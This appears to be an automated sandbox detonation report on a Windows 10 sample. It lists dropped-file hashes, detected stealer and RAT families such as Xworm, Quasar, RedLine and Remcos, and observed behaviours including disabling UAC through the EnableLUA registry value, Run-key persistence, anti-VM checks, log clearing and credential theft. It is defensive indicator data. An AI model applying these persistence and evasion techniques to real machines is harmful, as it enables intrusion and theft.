| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\tmpEBFF.tmp.dat
| MD5 | 2ba42ee03f1c6909ca8a6575bd08257a |
| SHA1 | 88b18450a4d9cc88e5f27c8d11c0323f475d1ae6 |
| SHA256 | a14fb57193e6930fa9e410d9c55dfe98e3ae5e69b22356e621edc73683a581bd |
| SHA512 | a1f32c22f0d78cba95c04c432e2a58ea47fb34942e70bfdceffcc2ac1e91b87a3da2cd9f93793427ee09a623c7da700e1c16977d41a44286317e8fc20502f035 |
memory/2572-5891-0x00000000001A0000-0x00000000001B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
| MD5 | db69b881c533823b0a6cc3457dae6394 |
| SHA1 | 4b9532efa31c638bcce20cdd2e965ad80f98d87b |
| SHA256 | 362d1d060b612cb88ec9a1835f9651b5eff1ef1179711892385c2ab44d826969 |
| SHA512 | b9fe75ac47c1aa2c0ba49d648598346a26828e7aa9f572d6aebece94d8d3654d82309af54173278be27f78d4b58db1c3d001cb50596900dee63f4fb9988fb6df |
memory/728-5934-0x0000000000EC0000-0x0000000000ED6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
| MD5 | 4d58df8719d488378f0b6462b39d3c63 |
| SHA1 | 4cbbf0942aeb81cc7d0861d3df5c9990c0c0c118 |
| SHA256 | ecf528593210cf58333743a790294e67535d3499994823d79a1c8d4fa40ec88d |
| SHA512 | 73a5fea0cf66636f1f7e1cf966a7d054e01162c6e8f1fc95626872d9e66ea00018a15a1b5615f5398c15316e50bf40336c124c7320b1d66893c1edb16c36b738 |
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
| MD5 | 2a4ccc3271d73fc4e17d21257ca9ee53 |
| SHA1 | 931b0016cb82a0eb0fd390ac33bada4e646abae3 |
| SHA256 | 5332f713bef3ab58d7546f2b58e6eaf55c3e30969e15b6085a77e7fd9e7b65b4 |
| SHA512 | 00d6728fa5c2692dab96107187126a44e09976f0d26875f340b3ad0d3f202abb4fbc5426f2934096087ef6e404bc1dc21b6e6ebbacba172c383d57bdef185a74 |
memory/5340-5972-0x0000000000F30000-0x0000000001180000-memory.dmp
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new
| MD5 | 008a029b0044f4fb3806301138072816 |
| SHA1 | 586ea27e9e08f170d1dfb4a45e0266ac07b341d8 |
| SHA256 | de6c01cd7762eeb1099c58faf94a707663422d43ed63deb84c68385ca4913f63 |
| SHA512 | 883cff3fe5cbfbddd2bbb5adbcad3e730b6de19c4cf1c6b5c91388a5ef0168cac6d65a74b413e6118e1ee0cf28172c1ffe8d916bf36b39b659c320d2699de5ae |
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
| MD5 | eaef085a8ffd487d1fd11ca17734fb34 |
| SHA1 | 9354de652245f93cddc2ae7cc548ad9a23027efa |
| SHA256 | 1e2731a499887de305b1878e2ad6b780ff90e89bc9be255ae2f4c6fa56f5cf35 |
| SHA512 | bfda0cb7297d71ad6bf74ec8783e279547740036dd9f42f15640d8700216cdd859b83cc720e9f3889a8743671b4d625774f87e0d1768f46d018fccaf4dbef20e |
memory/5608-6032-0x0000000000010000-0x0000000000260000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
| MD5 | aeb9f8515554be0c7136e03045ee30ac |
| SHA1 | 377be750381a4d9bda2208e392c6978ea3baf177 |
| SHA256 | 7f671b0f622d94aebf0c6ab2f021b18e1c60beda819bc48c0b2c6a8f5fdd7e02 |
| SHA512 | d0cfc09d01bd42e0e42564f99332030ed2ff20624bfd83a3f1bb3682fe004e90d89539f5868bba637287795e2668dd14409e2e0ed2ea1c6982c7ce11db727bb4 |
memory/5292-6057-0x0000000000CA0000-0x0000000000EF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
| MD5 | aa7c3909bcc04a969a1605522b581a49 |
| SHA1 | e6b0be06c7a8eb57fc578c40369f06360e9d70c9 |
| SHA256 | 19fcd2a83cd54c9b1c9bd9f8f6f7792e7132156b09a8180ce1da2fe6e2eeaaab |
| SHA512 | f06b7e9efe312a659fd047c80df637dba7938035b3fd5f03f4443047f4324af9234c28309b0b927b70834d15d06f0d8e8a78ba6bd7a6db62c375df3974ce8bd0 |
memory/5744-6061-0x0000000000280000-0x0000000000298000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
| MD5 | d4a8ad6479e437edc9771c114a1dc3ac |
| SHA1 | 6e6970fdcefd428dfe7fbd08c3923f69e21e7105 |
| SHA256 | a018a52ca34bf027ae3ef6b4121ec5d79853f84253e3fad161c36459f566ac2b |
| SHA512 | de181dc79ca4c52ce8de3abc767fbb8b4fd6904d278fa310eee4a66056161c0b9960ef7bebf2ebf6a9d19b653190895e5d1df92c314ca04af748351d6fb53e07 |
C:\Users\Admin\AppData\Local\44\Process.txt
| MD5 | 98c9e9af730a27bf19a9703132d29bce |
| SHA1 | 5f02627db32179ac3edc56005762477743357cfb |
| SHA256 | 5000d8dbe0058f08b0e12c9d2af3ad6fb3ff197213ecd4657582e72d81c5a808 |
| SHA512 | ad5b013a8136cef7a8e8d407cf7d63e4fbe4b8dd66d6e8d3632bdcdd08c5eadbc3f348c5281724bb07ca1c4639e604e528574113303a9c12905b432c29cbcec5 |
memory/5608-6429-0x0000000000010000-0x0000000000260000-memory.dmp
memory/1652-6435-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp
C:\Users\Admin\AppData\Local\44\Process.txt
| MD5 | 8bb1d3611cdc1c42febe5bb10085e227 |
| SHA1 | 51c9cb6d2333190ddeb728039f736ff9b2e9c3a0 |
| SHA256 | 3d3053a0d225433ac405989dd7e4a80dc9b6ee147511bca3c18b56d5c2c09dbb |
| SHA512 | 91e7103e121a427b676efb968acf6ef7fbdb99e0dc360e7f973c5ac8358146a510dfc8299201bcc65346d1e79821b4e123697b88d2fb992f2955fc7702213d2b |
C:\Users\Admin\AppData\Local\Temp\rascqn.exe
| MD5 | 7353f60b1739074eb17c5f4dddefe239 |
| SHA1 | 6cbce4a295c163791b60fc23d285e6d84f28ee4c |
| SHA256 | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c |
| SHA512 | bd98c8aee1138d17c39f2fb0e09bf79ef2d6096464ceb459cc66c5fb670df093414a373bbb4b4d8e7063c2eacb120449c45df218033f2258f56bec1618b43c4c |
memory/4444-6534-0x0000000006280000-0x00000000065D4000-memory.dmp
memory/4280-6545-0x000001406B9A0000-0x000001406B9E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\History
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
C:\Users\Admin\AppData\Local\Temp\Cookies
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\sensitive-files.zip
| MD5 | 35a512d0a0fcd92a78e0a07d2ee5b42f |
| SHA1 | fe53e9ec4832c2e3f2369d1391bdc0af99a9649f |
| SHA256 | 2e249f59c06f74e9759aaeeb2cec12a14812f0fb091621accc6f73ddd99912f7 |
| SHA512 | a9e9da1404e7a63667c118b02c18a3e35ad72dcacedbdcd3891040e27c4b03fe0b57b632b74ecb58dfa7db6588473f27bd5616d88288cd8bec6e77d5ab8ca536 |
C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\user_info.txt
| MD5 | ea1a4b63623b56d3fe7e6f98d57beaa8 |
| SHA1 | aa3ede875b64003d3044dc6049ac61521b496008 |
| SHA256 | 57ee9ce5b0367764d7b23d03e71d2eb2abecbd0a90ae3d16f0c7a4e6e523bd2d |
| SHA512 | 259ab6a120a22450c3726dbbfff20544e74ff0a7e894cd6cad4c82a20856a928b3b0574f57e59858783644545daa8268d8a85c87549a5179198b5ee72717a2d2 |
C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\screen1.png
| MD5 | 122ccdd6af3f4f83664eb7c1878c0d82 |
| SHA1 | 76710e508cea20e57649d3afb0686eb44fff5208 |
| SHA256 | e6a4719de90be014fd62c6237114ba78d1431f12082895e8f82c65e8687d1bdb |
| SHA512 | 9c2c3d954528cfb23546a6b20a3f23ae991c842f210f227380eaff5bb7014a4f20eace15ff100fe278a6559d2eef8643bf9cdc3c51b6e03a7523e614af3fafba |
C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\Cookies\Chrome_Default_Network.txt
| MD5 | e531d4f2d5e8f1c28116eed93558eab8 |
| SHA1 | c8633f7e6383a00feaa3e4a9570486942267ee86 |
| SHA256 | 68ef2f26ded177b3efade41f1a03e3a3ee3169c1c62d594bb505123d1ab33183 |
| SHA512 | 9e29e48c24401cdaa1a1b2c5bce9a7433d91af4b383004875a7961402c4a90bbe69b0de1b9dea9ede3dac6e6da5ced56f899eb91a66e725e0f48d1678d1cd720 |
C:\Users\Admin\AppData\Local\Temp\tmp5DC3.tmp.dat
| MD5 | b24f8b8f6cc374ef423424348437ede6 |
| SHA1 | eff0bcd8ae39f065d09a0b75de919093302646d3 |
| SHA256 | 14d3ad79b4ce62e53ec83a469cdd0a81763311709df8819301827a9671f67092 |
| SHA512 | 6a61771c7f3688dc16a2ac8d25b79bbb659444842e7fc7eb62d697b6061d5bba78b93149a653dd89ffa3bd8f21fe8d0c0371c8382cb5decb07ff31c4556597ad |
C:\Users\Admin\AppData\Local\Temp\tmp5DC2.tmp.dat
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-12 18:19
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
123s
Max time network
301s
Command Line
Signatures
44Caliber
44Caliber family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RMS
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Rms family
Stealc
Stealc family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5316 created 5204 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 5620 created 3200 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\schtasks.exe |
| PID 5204 created 4012 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe |
| PID 6732 created 2080 | N/A | N/A | C:\Windows\System32\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\qwex.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx | C:\Windows\System32\svchost.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
